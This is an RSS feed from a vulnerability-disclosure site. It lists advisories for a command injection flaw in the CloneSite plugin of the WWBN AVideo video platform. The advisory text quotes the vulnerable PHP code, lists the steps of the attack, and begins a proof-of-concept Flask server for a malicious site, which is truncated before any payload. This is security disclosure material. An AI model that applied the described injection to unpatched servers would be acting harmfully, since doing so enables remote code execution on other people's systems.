<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Thu, 08 Oct 2026 18:46:54 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-292668</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-292668</link>
      <description>EUVD-2026-292668</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-292668</guid>
    </item>
    <item>
      <title>fkie_cve-2026-41304</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-41304</link>
      <description>&lt;p&gt;WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;WWBN AVideo is an open source video platform. In versions 29.0 and below, the `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to Remote Code Execution (RCE) on the server. Commit 473c609fc2defdea8b937b00e86ce88eba1f15bb contains a fix.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-41304</guid>
    </item>
    <item>
      <title>GHSA-xr6f-h4x7-r6qp — WWBN AVideo: RCE cause by clonesite plugin</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-xr6f-h4x7-r6qp</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: wwbn/avideo&lt;/p&gt;
&lt;p&gt;Description&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.&lt;/p&gt;
&lt;p&gt;An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn&amp;#39;t have proper sanitization&lt;/p&gt;
&lt;p&gt;```php
$objClone-&amp;gt;cloneSiteURL = str_replace(&amp;#34;&amp;#39;&amp;#34;, &amp;#39;&amp;#39;, escapeshellarg($objClone-&amp;gt;cloneSiteURL));
```&lt;/p&gt;
&lt;p&gt;use `str_replace ` make `&amp;#39;` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce&lt;/p&gt;
&lt;p&gt;```php
$sqlURL = &amp;#34;{$objClone-&amp;gt;cloneSiteURL}videos/clones/{$json-&amp;gt;sqlFile}&amp;#34;; \\116
$cmd = &amp;#34;wget -O {$sqlFile} {$sqlURL}&amp;#34;; \\117
exec($cmd . &amp;#34; 2&amp;gt;&amp;amp;1&amp;#34;, $output, $return_val);                 \\119
```&lt;/p&gt;
&lt;p&gt;The attack flow&lt;/p&gt;
&lt;p&gt;1. make a evil site to provide date&lt;/p&gt;
&lt;p&gt;2. add  evil url in `objects/pluginAddDataObject.json.php`&lt;/p&gt;
&lt;p&gt;3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce&lt;/p&gt;
&lt;p&gt;## Poc&lt;/p&gt;
&lt;p&gt;make a evil site use python like this&lt;/p&gt;
&lt;p&gt;```python
from flask import Flask, jsonify, request&lt;/p&gt;
&lt;p&gt;app = Flask(__name__)&lt;/p&gt;
&lt;p&gt;@app.route(&amp;#39;/&amp;#39;, defaults={&amp;#39;path&amp;#39;: &amp;#39;&amp;#39;})
@app.route(&amp;#39;/&amp;lt;path:path&amp;gt;&amp;#39;)
def catch_all(path):
    print(&amp;#34;PATH:&amp;#34;, path)&lt;/p&gt;
&lt;p&gt;return jsonify({
            &amp;#34;error&amp;#34;: False,
            &amp;#34;msg&amp;#34;: &amp;#34;&amp;#34;,…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Packagist: wwbn/avideo&lt;/p&gt;
&lt;p&gt;Description&lt;/p&gt;
&lt;p&gt;## Summary&lt;/p&gt;
&lt;p&gt;The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.&lt;/p&gt;
&lt;p&gt;An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.&lt;/p&gt;
&lt;p&gt;## Details&lt;/p&gt;
&lt;p&gt;Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn&amp;#39;t have proper sanitization&lt;/p&gt;
&lt;p&gt;```php
$objClone-&amp;gt;cloneSiteURL = str_replace(&amp;#34;&amp;#39;&amp;#34;, &amp;#39;&amp;#39;, escapeshellarg($objClone-&amp;gt;cloneSiteURL));
```&lt;/p&gt;
&lt;p&gt;use `str_replace ` make `&amp;#39;` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce&lt;/p&gt;
&lt;p&gt;```php
$sqlURL = &amp;#34;{$objClone-&amp;gt;cloneSiteURL}videos/clones/{$json-&amp;gt;sqlFile}&amp;#34;; \\116
$cmd = &amp;#34;wget -O {$sqlFile} {$sqlURL}&amp;#34;; \\117
exec($cmd . &amp;#34; 2&amp;gt;&amp;amp;1&amp;#34;, $output, $return_val);                 \\119
```&lt;/p&gt;
&lt;p&gt;The attack flow&lt;/p&gt;
&lt;p&gt;1. make a evil site to provide date&lt;/p&gt;
&lt;p&gt;2. add  evil url in `objects/pluginAddDataObject.json.php`&lt;/p&gt;
&lt;p&gt;3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce&lt;/p&gt;
&lt;p&gt;## Poc&lt;/p&gt;
&lt;p&gt;make a evil site use python like this&lt;/p&gt;
&lt;p&gt;```python
from flask import Flask, jsonify, request&lt;/p&gt;
&lt;p&gt;app = Flask(__name__)&lt;/p&gt;
&lt;p&gt;@app.route(&amp;#39;/&amp;#39;, defaults={&amp;#39;path&amp;#39;: &amp;#39;&amp;#39;})
@app.route(&amp;#39;/&amp;lt;path:path&amp;gt;&amp;#39;)
def catch_all(path):
    print(&amp;#34;PATH:&amp;#34;, path)&lt;/p&gt;
&lt;p&gt;return jsonify({
            &amp;#34;error&amp;#34;: False,
            &amp;#34;msg&amp;#34;: &amp;#34;&amp;#34;,…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-xr6f-h4x7-r6qp</guid>
    </item>
  </channel>
</rss>
